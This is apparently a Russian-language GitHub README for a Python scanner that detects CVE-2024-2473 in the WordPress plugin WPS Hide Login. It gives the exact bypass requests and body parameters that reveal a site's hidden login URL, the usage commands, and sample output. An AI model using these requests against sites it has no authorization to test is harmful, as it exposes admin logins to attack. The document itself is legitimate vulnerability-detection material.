
Wordpress Hidden Login Page Disclosure. Detect Login Page Disclosure in WordPress sites running WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
Профессиональный сканер на Python для обнаружения раскрытия страницы входа на сайтах WordPress с WPS Hide Login ≤ 1.9.15.2
Написан Venexy
WPS Hide Login — популярный плагин WordPress, позволяющий администраторам изменить стандартный URL /wp-login.php на кастомный скрытый путь, что реализует защиту через сокрытие.
Этот сканер обнаруживает CVE-2024-2473 — уязвимость, при которой параметр action=postpass можно передать для полного обхода механизма защиты плагина, раскрывая URL скрытой страницы входа неаутентифицированным злоумышленникам.
Плагин WPS Hide Login перемещает страницу входа WordPress с адреса по умолчанию /wp-login.php на кастомный URL, выбранный администратором. Однако во всех версиях, вплоть до 1.9.15.2, передача параметра запроса action=postpass на /wp-login.php или /wp-admin/ обходит эту защиту, раскрывая фактический URL действия скрытой формы входа — тем самым злоумышленник без аутентификации узнаёт секретный путь входа.
Сканер воспроизводит процесс атаки в три фазы:
Фаза 1 ─► Подтвердить, что цель является установкой WordPress
│
▼
Фаза 2a ─► POST /wp-login.php?action=postpass
с телом: action=lostpassword&post_password=test
Проверка: HTTP 200 + наличие lostpasswordform + отсутствие wp-login.php в теле
Извлечение URL скрытого входа из атрибута action формы
│
Фаза 2b ─► POST /wp-admin/?action=postpass
Проверка: HTTP 302 редирект на location, содержащий reauth=1 или /login
│
▼
Сообщить URL скрытого входа, если найден
Если любая из фаз 2a или 2b совпадает, цель помечается как уязвимая.
requests1. Клонировать репозиторий
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. Установить зависимости
pip install requests
Примечание: В системах с виртуальным окружением Python или Kali Linux может потребоваться:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| Аргумент | Описание | Значение по умолчанию |
|---|---|---|
-u, --url |
# Базовое сканирование
python CVE-2024-2473.py -u https://example.com
# Сканирование с кастомным таймаутом
python CVE-2024-2473.py -u https://example.com --timeout 15
# Сканирование через HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Всегда получайте явное письменное разрешение от владельца целевой системы перед проведением любой оценки безопасности. Несанкционированное сканирование или эксплуатация систем незаконны и неэтичны.
Используйте ответственно.
Написано с ❤️ Venexy Venexy
Если этот инструмент помог вам, поставьте репозиторию ⭐🌟🌟🌟
| Поле | Подробности |
|---|
| CVE ID | CVE-2024-2473 |
| Затронуто | Плагин WPS Hide Login ≤ 1.9.15.2 для WordPress |
| Серьёзность | Средняя |
| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — Раскрытие конфиденциальной информации |
| EPSS Score | 0.10433 (93-й перцентиль) |
| Требуется аутентификация | Нет |
| Вендор | WPServeur |
| Устранение | Обновить плагин до версии > 1.9.15.2 |
| Базовый URL целевого WordPress (обязательно) |
| — |
-t, --timeout | Таймаут HTTP-запроса в секундах | 10 |
| Ресурс | Ссылка |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Уведомление Wordfence | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| Плагин WPS Hide Login | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| Калькулятор CVSS 3.1 | https://www.first.org/cvss/calculator/3.1 |